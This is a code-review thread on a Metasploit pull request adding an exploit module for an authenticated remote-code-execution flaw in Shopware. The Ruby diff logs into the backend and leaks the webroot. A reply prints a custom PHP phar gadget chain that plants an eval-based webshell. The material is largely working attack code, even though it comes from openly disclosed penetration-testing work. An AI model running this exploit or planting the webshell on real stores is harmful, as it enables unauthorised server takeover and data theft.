modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb

```diff
@@ -0,0 +1,262 @@
+        Shopware. An authenticated backend user could exploit the vulnerability.
+
+        The vulnerability exists in the createInstanceFromNamedArguments function, where the code
+        insufficiently performs whitelist check which can be bypassed to trigger an object injection.
+
+        An attacker can leverage this to deserialize an arbitrary payload and write a webshell to
+        the target system, resulting in remote code execution.
+
+        Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Karim Ouerghemmi',               # original discovery
+          'mr_me <steven@srcincite.io>',    # patch bypass, rce & msf module
+        ],
+      'References' =>
+        [
+          ['CVE', '2017-18357'],                                                                         # not really because we bypassed this patch
+          ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/']      # initial writeup w/ limited exploitation
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "May 09 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base Shopware path", '/']),
+        OptString.new('USERNAME', [true, "Backend username to authenticate with", 'demo']),
+        OptString.new('PASSWORD', [false, "Backend password to authenticate with", 'demo'])
+      ]
+    )
+  end
+
+  def do_login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'Login', 'login'),
+      'vars_post' => {
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200
+      @cookie = res.get_cookies.match(/(SHOPWAREBACKEND=.{26};)/)[1]
+      return
+    end
+    fail_with(Failure::NoAccess, "Authentication was unsuccessful")
+  end
+
+  def get_webroot
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo', 'info'),
+      'headers' => {
+        'Cookie' => @cookie,
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200 && res.body =~ /DOCUMENT_ROOT/i
+      @webroot = $1 if res.body =~ /DOCUMENT_ROOT <\/td><td class=\"v\">(.*) <\/td><\/tr>/
+      return
+    end
+    fail_with(Failure::Unknown, "Unable to leak the webroot")
+  end
+
+  def generate_phar
+    @php = "#{@webroot}#{target_uri.path}media/#{@shll_bd}.php"
+    register_file_for_cleanup("#{@shll_bd}.php")
+    pop  = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":2:{s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";"
```

Comment:
Presumably this gadget was generated with [phpggc](https://github.com/ambionics/phpggc/tree/master/gadgetchains/Guzzle) ? If so, please provide the command used to generate the payload in a comment, here.

Reply:
No, this is one I custom built.

```php
<?php

namespace GuzzleHttp\Cookie;

// pop chain
interface ToArrayInterface {}

class SetCookie implements ToArrayInterface {
    private $data;

    public function __construct(array $data = []){
        $this->data = $data;
    }
}

class CookieJar implements ToArrayInterface {
    private $cookies;

    public function setCookie(SetCookie $cookie){
        $this->cookies = array($cookie);
    }
}

class FileCookieJar extends CookieJar {
    private $filename;

    public function __construct($bd_file){
        $this->filename = $bd_file;
        $this->setCookie(new SetCookie(array(
            "Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
            "Expires" => true,
            "Discard" => false,
        )));
    }
}

// create new Phar
$phar = new \Phar('poc.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ? >');

// add object of any class as meta data
$o = new FileCookieJar("/var/www/html/media/image/si.php");
$phar->setMetadata($o);
$phar->stopBuffering();
?>
```

Reply:
So long as you're happy to disclose your custom gadget construction skills here, may as well include it in the module documentation too.

Reply:
ok, done.